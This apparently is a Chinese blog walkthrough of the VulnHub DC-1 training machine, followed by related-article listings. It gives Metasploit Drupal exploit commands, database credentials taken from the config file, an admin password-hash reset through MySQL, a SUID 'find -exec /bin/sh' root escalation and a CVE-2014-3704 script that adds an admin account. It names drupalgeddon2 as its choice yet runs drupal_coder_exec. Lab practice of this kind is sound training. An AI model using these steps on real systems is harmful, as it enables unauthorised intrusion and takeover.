【Vulnhub系列】DC1

最新推荐文章于 2024-01-14 20:06:26 发布
最新推荐文章于 2024-01-14 20:06:26 发布
阅读量6.1k 收藏 6
点赞数 3
分类专栏: VULNHUB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/114484232
版权

文章目录


下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

基本信息

Kali:192.168.56.116
DC1:192.168.56.115

实验过程

现在Kali中使用arp-scan进行主机探活

sudo arp-scan --interface=eth1 192.168.56.0/24

在这里插入图片描述
逐个排查发现DC1的IP地址为192.168.56.115

然后使用nmap对主机进行探测

nmap -sC -sV -A -oA vulnhub/DC1/DC1 192.168.56.115

在这里插入图片描述
主机分开开了:22,80,111端口

我们先从80端口入手

在这里插入图片描述

可以发现网站是Drupal cms管理系统

我们启动msf,搜索下Drupal可用的EXP

msf6 > search Drupal

在这里插入图片描述
这里我们选用exploit/unix/webapp/drupal_drupalgeddon2

因为他是最新的,而且品质为excellent

msf6 > use exploit/unix/webapp/drupal_coder_exec
msf6 exploit(unix/webapp/drupal_coder_exec) > show options
msf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115
msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116
msf6 exploit(unix/webapp/drupal_coder_exec) > run

在这里插入图片描述
这样我们就可以成功得到一个会话。

我们用会话返回一个shell
在这里插入图片描述
发现flag1.txt
在这里插入图片描述
查看下flag1.txt内容

在这里插入图片描述
给我们一个提示
Every good CMS needs a config file - and so do you.

百度drupal配置文件的位置
在这里插入图片描述

sites/default/files

在这里插入图片描述
里面可以看到数据库的账号密码,同时我们还可以看到flag2的内容说:爆破不是唯一获得访问权限方法

    'database' => 'drupaldb',                             
      'username' => 'dbuser',                             
      'password' => 'R0ck3t',

在这里插入图片描述
那么我们用获得数据库的账号密码登录下数据看看

这里需要注意的是,我们需要用python转换成标准的shell
否则就会出现下面的场景,进入mysql之后shell就没有反应
在这里插入图片描述
我们输入

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

mysql> show databases;
mysql> use drupaldb;
mysql> show tables;
mysql> select * from users;
mysql> select name,pass from users;

在这里插入图片描述
这里的密码是经过drupal加密

在scripts的文件夹中有用来算密码的脚本
但是因为靶机的环境原因会报错
在这里插入图片描述

明文:password
密文:$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

在这里插入图片描述
接下来我们把管理员的密码重置下

mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';

在这里插入图片描述
然后进行登录
在这里插入图片描述
然后发现flag3
在这里插入图片描述
从flag3的内容可以看出,提示我们需要用find提权

同时我们也可以在家目录中找到flag4

在这里插入图片描述

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

我们使用find找下具有root权限的suid

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
可以看到find是可以用来提权的

我们尝试用find执行命令

# 这里需要注意-name参数填写的文件名,是需要系统真实存在的
www-data@DC-1:/home/flag4$ find / -name flag4 -exec "whoami" \;

在这里插入图片描述
那么我们接下来用find提权

www-data@DC-1:/home/flag4$ find / -name flag4 -exec "/bin/sh" \;

在这里插入图片描述
这样我们就拿到最终的flag

额外内容

使用CVE2014-3704添加管理账号

在exploit-db中有可以直接利用的EXP,可以直接添加管理账号
地址:https://www.exploit-db.com/exploits/34992
我们在Kali上开启HTTP服务,让靶机从Kali上下载EXP

在这里插入图片描述
然后我们通过这个EXP创建管理账号

www-data@DC-1:/var/www$ python 34992.py -t http://192.168.56.115/ -u dfz -p ms08067

在这里插入图片描述
然后就可以正常登录
在这里插入图片描述

另一种查询具有root权限命令的find语句

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

大方子
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1483
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7497
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
vulnhubDC1
开心星人的博客
06-25 530
下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 我也不太懂,我选了第二个,可以用用vmmare打开DC-1.ova 选设置 要选NAT模式kali也要选NAT模式,这样攻击机和靶机就处于同一内网主机发现 这里用 太大太小的可能是网关,可以看【Try to Hack】ip地址 所以DC-1 的ip为192.168.88.138信息收集 浏览器看看80端口 drupal这个cms搭建的 直接上msf 随便选择一个模块(基本上都能拿到she
Vulnhub系列DC1靶场详解
weixin_50053818的博客
05-04 3377
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
Vulnhub | DC1靶机 渗透测试
菜鸡一枚
02-22 166
Vulnhub-DC系列第一个靶机,drupal exp利用、数据库替换密码、hydra爆破ssh、SUID find提权
Vulnhub-DC1
最新发布
weixin_44770698的博客
01-14 846
靶场练习
vulnhub靶机 DC1练习之find提权
qq_43232893的博客
10-14 475
vulnhub系列 DC1 靶机vulnhub系列 DC1 靶机开始 vulnhub系列 DC1 靶机 DC靶机的内网渗透,简介里说我们要找出5个flge就算通关了 开始 靶场启动后我们内网扫一波找出靶机的ip地址,这里我们用nmap扫。 端口扫描: 这里我们访问一下开放的80端口: 在百度搜索drupal存在远程代码执行漏洞 CVE-2018-7600远程代码执行漏洞复现 这里我们直接用msf进行复现: search CVE-2018-7600 搜索复现模块 use 模块路径 show optio
vulnhub DC1 靶场练习
鸥鹭忘机
08-10 1893
前言 这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。下面就直接开始把。 配置靶机 和上一台靶机一样,打开没有自动分配到IP。如何配置可以看我上一篇博客https://blog.csdn.net/rpsate/article/details/119494515。但是这一次在配置的最后一步——重启
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1_map_airtrafficcontrol_
10-02
Map值的计算通常基于一系列复杂的算法,包括对不同类型的告警事件、告警频率、告警严重程度等因素的统计和分析。 DC1.m 文件可能是用MATLAB编程语言编写的脚本或函数,用于执行Map值的计算和可视化。MATLAB是一种...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
Vulnhub】DC9
大方子
01-16 5390
靶机下载地址:http://www.five86.com/downloads/DC-9.zip 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.168.56.1/24 用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112 可以看到DC开放了80端口以及22端口(被过滤) nmap -sC -sV -oA dc-9 192.168.56
Vulnhub系列】DC2
大方子
04-08 5139
文章目录基本信息实验过程额外内容rbash另一种绕过方式另一种查看当前用户可用命令方式 靶机下载地址:https://www.five86.com/downloads/DC-2.zip 基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.168.61.1/24 排查筛选得知,192.168.61.162为DC2的IP地址 接下来用Nmap对DC2进行端口扫描 n
Vulnhub系列】DC3
大方子
04-08 5088
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标机器上正确添加了反弹shell的代码,并将其放置在适当的位置,比如backups.sh文件中。最后,您需要等待计划任务执行反弹shell的代码。如果仍然无法成功反弹shell,请检查您的代码和配置是否正确,并确保您有足够的权限执行这些操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值